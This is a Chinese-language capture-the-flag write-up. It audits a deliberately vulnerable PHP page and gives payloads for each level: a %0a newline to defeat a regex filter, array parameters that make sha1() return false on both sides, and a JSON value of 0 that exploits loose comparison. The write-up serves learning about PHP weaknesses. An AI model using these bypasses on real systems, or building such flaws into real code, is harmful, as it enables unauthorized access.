preg_replace绕过以及sha1()函数的绕过以及json编码

preg_replace绕过以及sha1()函数绕过以及json编码

打开页面,有源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa'])&&strlen($_GET['aaa']<20)){
$aaa=preg_replace('/^(.*)level(.*)$/','${1}<!-- filtered -->${2}',$_GET['aaa']);
if(preg_match('/pass_the_level_1#/',$aaa)){
echo "here is level 2";

if(isset($_POST['admin']) and isset($_POST['root_pwd'])){
if($_POST['admin']==$_POST['root_pwd'])
echo "<p>The level 2 can not pass!</p>";

else if(sha1($_POST['admin'])===sha1($_POST['root_pwd'])){
echo "here is level 3,do you how to overcome it?";
if(isset($_POST['level_3'])){
$level_3=json_decode($_POST['level_3']);
if($level_3->result==$result){
echo "success:".$flag;
}
else{
echo "you never beat me!";
}
}
else{
echo "out";
}
}
else{
die("no");
}
}
else{
echo '<p>out!</p>';
}
}
else{
echo "nonono!";
}
echo "<hr>";
}
?>

通过对源码的审计,我们知道只要我们通过三个if,我们就可以读取flag

1
2
3
4
5
if(preg_match('/pass_the_level_1#/',$aaa))

else if(sha1($_POST['admin'])===sha1($_POST['root_pwd']))

if($level_3->result==$result)

对于第一个if,我们可以看见

1
2
3
$aaa=preg_replace('/^(.*)level(.*)$/','${1}<!-- filtered -->${2}',$_GET['aaa']);
if(preg_match('/pass_the_level_1#/',$aaa)){
echo "here is level 2";

我们需要绕过preg_replace()函数,而由于

1
/^$/

是单行的检测替换,所以我们可以通过换行符来绕过,因此构造payload

1
?aaa=%0apass_the_level_1%23

既可通过第一个if,而对于第二个if,是sha1()的加密,它在低版本的php中有一个漏洞,就是当对数组进行加密时,由于sha1()无法处理数组类型,所以会报错且会返回false,从而绕过第二个if,因此构造payload

1
?admin[]=&root_pwd[]=123

对于第三个if,它首先会进行json解码

1
$level_3=json_decode($_POST['level_3']);

而第三个if是

1
if($level_3->result==$result)

所以我们需要输入json编码

1
{"result":0}

即可绕过第三个if,而原因好像是当我们这样构造时,输入进去的是int类型,而在比较时会转换为相同的数据类型,所以才会通过第三个if